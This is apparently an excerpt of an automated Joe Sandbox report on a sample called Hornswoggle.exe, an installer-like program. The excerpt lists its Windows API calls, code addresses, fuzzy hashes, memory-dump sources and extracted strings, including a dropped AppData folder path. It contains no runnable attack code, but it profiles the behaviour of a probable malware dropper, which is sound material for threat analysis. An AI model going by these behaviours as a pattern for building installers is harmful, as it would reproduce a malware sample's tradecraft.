                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
                                                        • Instruction ID: add50700843ac817ab7d6e51381e723622021bba1cfe7f2961aa6f321ae6f442
                                                        • Opcode Fuzzy Hash: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
                                                        • Instruction Fuzzy Hash: 1CC04C71744201BAEA319B509D49F0777986750700F6644257320B60D1C6B4E410E62D
                                                        APIs
                                                        • SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
                                                        • Instruction ID: a78b9239c319e9cb66b61a8ea9955aebbc10e43728856a3b978814f56e37e297
                                                        • Opcode Fuzzy Hash: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
                                                        • Instruction Fuzzy Hash: 19B092B6684200BAEE228B00DD09F457AB2E7A8742F008024B200240B0CAB200A1DB19
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EE1,?), ref: 004031F1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                        • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                        • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                        • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,00403E47), ref: 00404074
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
                                                        • Instruction ID: 4b90da896e4fa09681504a9dabf2ba00c57f91177066947fb67d52e8ca440c18
                                                        • Opcode Fuzzy Hash: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
                                                        • Instruction Fuzzy Hash: FCA012324040009BCB014B90FE04C457F31A754300701C031E10180030C2310824FF09
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404A11
                                                        • GetDlgItem.USER32(?,00000408), ref: 00404A1C
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A66
                                                        • LoadBitmapA.USER32(0000006E), ref: 00404A79
                                                        • SetWindowLongA.USER32(?,000000FC,00404FF0), ref: 00404A92
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AA6
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AB8
                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404ACE
                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404ADA
                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AEC
                                                        • DeleteObject.GDI32(00000000), ref: 00404AEF
                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B1A
                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B26
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BBB
                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BE6
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BFA
                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404C29
                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C37
                                                        • ShowWindow.USER32(?,00000005), ref: 00404C48
                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D45
                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DAA
                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DBF
                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DE3
                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E03
                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00404E18
                                                        • GlobalFree.KERNEL32(00000000), ref: 00404E28
                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EA1
                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00404F4A
                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F59
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F79
                                                        • ShowWindow.USER32(?,00000000), ref: 00404FC7
                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404FD2
                                                        • ShowWindow.USER32(00000000), ref: 00404FD9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 1638840714-813528018
                                                        • Opcode ID: f71c4aa5fa736d427a4380ee5912dc7cb3dc5a811f5ff7b07bbbad78877c99f0
                                                        • Instruction ID: 3cd80f6d66a0a8d02be1144e931921fec7cdafd03fadcad4e17be0217faf115b
                                                        • Opcode Fuzzy Hash: f71c4aa5fa736d427a4380ee5912dc7cb3dc5a811f5ff7b07bbbad78877c99f0
                                                        • Instruction Fuzzy Hash: 9D026EB0900209AFEB10DF94DD85AAE7BB5FB84315F10813AF611B62E1C7789E42DF58
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 004044D5
                                                        • SetWindowTextA.USER32(00000000,?), ref: 004044FF
                                                        • SHBrowseForFolderA.SHELL32(?,0041F108,?), ref: 004045B0
                                                        • CoTaskMemFree.OLE32(00000000), ref: 004045BB
                                                        • lstrcmpiA.KERNEL32(Remove folder: ,Festremser Setup: Completed), ref: 004045ED
                                                        • lstrcatA.KERNEL32(?,Remove folder: ), ref: 004045F9
                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040460B
                                                          • Part of subcall function 0040563D: GetDlgItemTextA.USER32(?,?,00000400,00404642), ref: 00405650
                                                          • Part of subcall function 004060CE: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Hornswoggle.exe",76003410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406126
                                                          • Part of subcall function 004060CE: CharNextA.USER32(?,?,?,00000000), ref: 00406133
                                                          • Part of subcall function 004060CE: CharNextA.USER32(?,"C:\Users\user\Desktop\Hornswoggle.exe",76003410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406138
                                                          • Part of subcall function 004060CE: CharPrevA.USER32(?,?,76003410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406148
                                                        • GetDiskFreeSpaceA.KERNEL32(0041ED00,?,?,0000040F,?,0041ED00,0041ED00,?,00000001,0041ED00,?,?,000003FB,?), ref: 004046C9
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046E4
                                                          • Part of subcall function 0040483D: lstrlenA.KERNEL32(Festremser Setup: Completed,Festremser Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
                                                          • Part of subcall function 0040483D: wsprintfA.USER32 ref: 004048E3
                                                          • Part of subcall function 0040483D: SetDlgItemTextA.USER32(?,Festremser Setup: Completed), ref: 004048F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: A$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$Festremser Setup: Completed$Remove folder: $error
                                                        • API String ID: 2624150263-4222094728
                                                        • Opcode ID: 270dc7a5b9dcdb78d87257eb559ab6150f0e039b037db56f317b36bf3157eca3
                                                        • Instruction ID: 175f10717e4f371f028a94a7e43d857af948bb7b3e906aba32508f1788989df3
                                                        • Opcode Fuzzy Hash: 270dc7a5b9dcdb78d87257eb559ab6150f0e039b037db56f317b36bf3157eca3
                                                        • Instruction Fuzzy Hash: 27A18FF1900209ABDB11AFA5CC45AAFB7B8EF85314F14843BF601B72D1D77C9A418B69
                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: a658cef3a5151b2b290093738bd42b6efc4bc145775ef21b79a10a3d683c1761
                                                        • Instruction ID: 89e5e1f79722e37631beb13baf5993bff89a91e8d172cde9574b2276e59dc765
                                                        • Opcode Fuzzy Hash: a658cef3a5151b2b290093738bd42b6efc4bc145775ef21b79a10a3d683c1761
                                                        • Instruction Fuzzy Hash: CCF02072608100AFE700EBB48948AEEB778DF20324F60057BE240A20C1C7B84A849A3A
                                                        APIs
                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040421C
                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 00404230
                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040424E
                                                        • GetSysColor.USER32(?), ref: 0040425F
                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040426E
                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040427D
                                                        • lstrlenA.KERNEL32(?), ref: 00404280
                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040428F
                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042A4
                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404306
                                                        • SendMessageA.USER32(00000000), ref: 00404309
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404334
                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404374
                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00404383
                                                        • SetCursor.USER32(00000000), ref: 0040438C
                                                        • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 0040439F
                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004043AC
                                                        • SetCursor.USER32(00000000), ref: 004043AF
                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043DB
                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043EF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                        • String ID: N$Remove folder: $\A@$open
                                                        • API String ID: 3615053054-2758328528
                                                        • Opcode ID: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
                                                        • Instruction ID: aa20bcc63d66581fa7bbac4c1809bf2e03719b1a0f02ef32c38fc7c0d03722a0
                                                        • Opcode Fuzzy Hash: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
                                                        • Instruction Fuzzy Hash: 3D6191B1A40209BBEF109F61DC45F6A7B69FB84714F108036FB01BA2D1C7B8A951CF98
                                                        APIs
                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        • API String ID: 941294808-1304234792
                                                        • Opcode ID: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                        • Instruction ID: f6076547c65416f673289c9e9aa760257b54fe90aa12de16c0a46004740ece36
                                                        • Opcode Fuzzy Hash: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                        • Instruction Fuzzy Hash: C2419B71804249AFCF058FA4CD459AFBBB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                        APIs
                                                        • lstrcpyA.KERNEL32(00421AC0,NUL,?,00000000,?,00000000,00405D3F,?,?), ref: 00405BBB
                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405D3F,?,?), ref: 00405BDF
                                                        • GetShortPathNameA.KERNEL32(?,00421AC0,00000400), ref: 00405BE8
                                                          • Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
                                                          • Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D
                                                        • GetShortPathNameA.KERNEL32(00421EC0,00421EC0,00000400), ref: 00405C05
                                                        • wsprintfA.USER32 ref: 00405C23
                                                        • GetFileSize.KERNEL32(00000000,00000000,00421EC0,C0000000,00000004,00421EC0,?,?,?,?,?), ref: 00405C5E
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C6D
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CA5
                                                        • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216C0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFB
                                                        • GlobalFree.KERNEL32(00000000), ref: 00405D0C
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D13
                                                          • Part of subcall function 00405AD6: GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00405ADA
                                                          • Part of subcall function 00405AD6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                        • String ID: %s=%s$NUL$[Rename]
                                                        • API String ID: 222337774-4148678300
                                                        • Opcode ID: 48efe9067dab4c6be72075fa3094db19553ee2d814aebd6cf6e6eb07f6957914
                                                        • Instruction ID: f02436ff356463cbad731f06bd7f36315381bbfe77d8bed81a3cf794d1fe08c5
                                                        • Opcode Fuzzy Hash: 48efe9067dab4c6be72075fa3094db19553ee2d814aebd6cf6e6eb07f6957914
                                                        • Instruction Fuzzy Hash: 2231C274604B597BD2207B615D49F6B3A9CEF45758F24013BF905B22D2DA78AC008EBD
                                                        APIs
                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Hornswoggle.exe",76003410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406126
                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00406133
                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\Hornswoggle.exe",76003410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406138
